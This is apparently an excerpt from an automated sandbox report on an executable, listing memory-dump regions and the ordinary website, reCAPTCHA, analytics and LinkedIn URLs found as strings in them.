00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F&#038;format=xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/xmlrpc.php?rsd
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668175631.0000000008D18000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D7D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LcHyq0UAAAAAGiNpvMw5_7JkN6Gt8I9SHaGgkJT&#038;ver=3.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdeMu0ZAAAAAFtmpTrTqJfRdq-yIJmXMOBmYWGU&#038;ver=3.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-CDTYFWBRBX
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-181916817-1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gpthink.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gzs.si/o_gzs
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.316969371.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jenco.co.uk/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ka-mo-me.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330814304.0000000009DD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/elpro-lepenik/about/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/pohl-food-service
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lrsuk.com/
